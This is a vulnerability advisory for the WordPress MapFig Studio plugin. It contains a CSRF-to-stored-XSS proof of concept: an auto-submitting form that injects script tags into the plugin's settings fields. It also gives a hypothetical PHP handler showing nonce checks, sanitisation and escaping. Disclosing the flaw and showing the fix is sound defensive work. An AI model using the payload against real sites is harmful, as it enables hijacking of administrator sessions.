Headline
WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting
WordPress MapFig Studio plugin versions 0.2.1 and below suffer from cross site request forgery and cross site scripting vulnerabilities.
# Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF
# Date: 15-04-2024
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/
# Version: <= 0.2.1
# Tested on: Firefox
# Contact me: [email protected]

The plugin does not have a CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make a logged-in admin add Stored XSS payloads via a CSRF attack.

Proof of Concept

Have a logged-in admin open a page containing:

```html
<html>
  <body>
    <form action="http://example.com/wp-admin/admin.php?page=studio_settings" method="POST">
      <input type="hidden" name="studio_apikey" value=""><script>alert(1)</script>" />
      <input type="hidden" name="studio_url" value=""><script>alert(1)</script>" />
      <input type="hidden" name="save" value="Save!" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

Reference:
https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/
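The advisory names three missing controls: a CSRF check on the settings form, sanitisation of the submitted values, and escaping when they are rendered back. The handler below is an added example of how a WordPress settings page normally applies all three; it is not MapFig Studio's code. The option names `studio_apikey` and `studio_url` are taken from the PoC form, while the `example_studio_*` function and nonce names are hypothetical.

```php
<?php
// Added example, not the plugin's own code. Demonstrates the nonce check,
// sanitisation and escaping that the advisory says the settings page lacks.

// Render the form with a nonce field. A forged POST from a third-party page
// (as in the PoC) cannot carry a valid nonce, so it fails verification below.
function example_studio_settings_form() {
    $apikey = get_option( 'studio_apikey', '' );
    $url    = get_option( 'studio_url', '' );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=studio_settings' ) ); ?>">
        <?php wp_nonce_field( 'example_studio_save', 'example_studio_nonce' ); ?>
        <!-- esc_attr() on output: even a stored quote cannot break out of the attribute -->
        <input type="text" name="studio_apikey" value="<?php echo esc_attr( $apikey ); ?>" />
        <input type="text" name="studio_url" value="<?php echo esc_attr( $url ); ?>" />
        <input type="submit" name="save" value="Save" />
    </form>
    <?php
}

// Handle the POST. Without the capability and nonce checks, the PoC form
// submitted from an attacker's page is accepted as if the admin had sent it.
function example_studio_save_settings() {
    if ( ! isset( $_POST['save'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Verifies the nonce and stops the request if it is missing or invalid.
    check_admin_referer( 'example_studio_save', 'example_studio_nonce' );

    // Sanitise on write: sanitize_text_field() strips tags, so the <script>
    // element in the PoC payload never reaches the database.
    $apikey = sanitize_text_field( wp_unslash( $_POST['studio_apikey'] ?? '' ) );
    // esc_url_raw() removes characters not valid in a URL and rejects
    // disallowed schemes before the value is stored.
    $url = esc_url_raw( wp_unslash( $_POST['studio_url'] ?? '' ) );

    update_option( 'studio_apikey', $apikey );
    update_option( 'studio_url', $url );
}
```

Sanitisation on write and escaping on output are independent layers: a value that slipped past the first is still neutralised by `esc_attr()` when rendered, which is why both are expected in plugin review.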